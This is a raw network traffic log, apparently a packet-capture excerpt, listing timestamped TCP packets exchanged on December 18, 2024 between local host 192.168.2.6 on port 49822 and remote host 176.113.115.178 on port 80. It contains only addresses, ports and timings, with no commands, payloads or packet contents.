                                                                  Dec 18, 2024 13:49:55.003988981 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.004646063 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.004873991 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.004952908 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.005654097 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.005986929 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.006151915 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.006666899 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.006895065 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.007035017 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.007654905 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.007906914 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.007996082 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.008692026 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.008920908 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.009290934 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.009661913 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.009900093 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.009985924 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.010704994 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.010879993 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.011507988 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.011687994 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.011884928 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.011987925 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.012693882 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.012919903 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.013159037 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.013675928 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.013901949 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.013986111 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.014693975 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.014919996 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.015018940 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.015755892 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.015985966 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.016076088 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.016792059 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.016968012 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.017231941 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.017739058 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.017956972 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.018174887 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.018723965 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.018953085 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.018995047 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.019712925 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.019974947 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.020699024 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.020806074 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.021014929 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.021122932 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.021732092 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.021994114 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.022068977 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.022885084 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.023024082 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.023089886 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.023845911 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.024036884 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.024092913 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.024746895 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.024985075 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.025441885 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.025799036 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.025981903 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.026082039 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.026761055 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.026976109 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.027019978 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.027772903 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.028017998 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.028073072 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.028883934 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.029053926 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.029165030 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.029875994 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.030113935 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.030262947 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.030863047 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.031074047 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.031131983 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.031784058 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.032016993 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.032362938 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.032798052 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.033042908 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.033123016 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.033791065 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.034034014 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.034434080 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.034867048 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.035053968 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.035135984 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.035866976 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.036107063 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.036170006 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.036818981 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.037067890 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.037193060 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.037818909 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.038037062 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.038234949 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.038840055 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.039060116 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.039105892 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.039832115 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.040047884 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.040743113 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.040899992 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.041074038 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.041117907 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.041857958 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.042068958 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.042304993 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.042903900 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.043090105 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.043153048 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.043857098 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.044083118 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.044131994 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.044871092 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.045092106 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.045185089 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.045875072 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.046116114 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.046451092 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.046967983 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.047231913 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.047331095 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.048044920 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.048255920 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.048378944 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.049105883 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.049320936 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.049452066 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.050045967 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.050168991 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.050280094 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.051117897 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.051291943 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.051523924 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.051954031 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.103107929 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.191474915 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.191725016 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.192047119 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.192101955 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.192533016 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.192610025 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.192975998 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.193377018 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.193530083 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.193912983 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.194215059 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.194412947 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.194951057 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.195188046 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.195254087 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.196028948 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.196119070 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.196158886 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.196834087 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.197082996 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.197267056 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.197822094 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.198065996 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.198137045 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.198812962 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.199011087 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.199151993 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.199774981 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.200006008 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.200056076 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.200758934 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.200958967 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.201169014 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.201843023 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.202050924 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.202523947 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.202692986 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.202914000 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.202967882 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.203651905 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.203891993 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.204004049 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.204704046 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.204893112 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.204957008 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.205637932 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.205857038 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.206269026 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.206595898 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.206836939 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.206887960 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.207602978 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.207803011 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.207906008 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.208592892 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.208853960 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.208901882 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.209531069 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.209784031 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.210055113 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.210726023 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.210901022 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.211005926 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.211544037 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.211760998 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.211819887 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.212543011 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.212765932 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.212817907 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.213531971 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.213707924 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.213835955 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.214508057 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.214699984 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.214854956 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.215514898 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.215701103 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.216202021 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.216485023 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.216792107 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.216845036 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.218272924 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.218457937 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.218504906 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.219063044 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.219222069 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.219372034 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.219933987 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.220181942 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.220232964 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.220752954 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.220948935 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.221061945 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.221577883 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.221776962 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.221991062 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.222388029 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.222515106 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.222780943 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.223371983 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.223612070 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.223697901 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.224199057 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.224462032 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.224509954 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.225253105 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.225440025 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.225608110 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.226231098 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.226425886 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.226567030 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.227180004 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.227406025 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.227701902 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.228159904 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.228368044 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.228410959 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.229126930 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.229357958 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.229454994 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.230185986 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.230355024 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.230408907 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.231117010 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.231422901 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.231467962 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.232182980 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.232428074 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.232557058 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.233093023 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.233315945 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.233412981 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.234059095 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.234277010 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.234524965 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.235044003 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.235254049 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.235305071 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.236187935 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.236327887 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.236366034 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.237024069 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.237229109 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.237284899 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.237936020 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.238166094 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.238238096 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.238944054 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.239141941 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.239288092 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.239902973 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.240133047 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.240192890 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.240943909 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.241190910 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.241266966 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.241980076 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.242177963 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.242258072 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.242759943 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.290657043 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.383944988 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.384200096 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.384290934 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.384604931 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.385030031 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.385116100 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.385447979 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.385812044 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.385947943 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.386323929 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.386662960 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.386702061 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.387298107 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.387527943 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.387583971 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.388403893 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.388542891 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.388648033 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.389261007 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.389492989 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.389600039 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.390430927 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.390661955 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.390795946 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.391267061 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.391501904 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.391591072 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.392292976 CET8049822176.113.115.178192.168.2.6
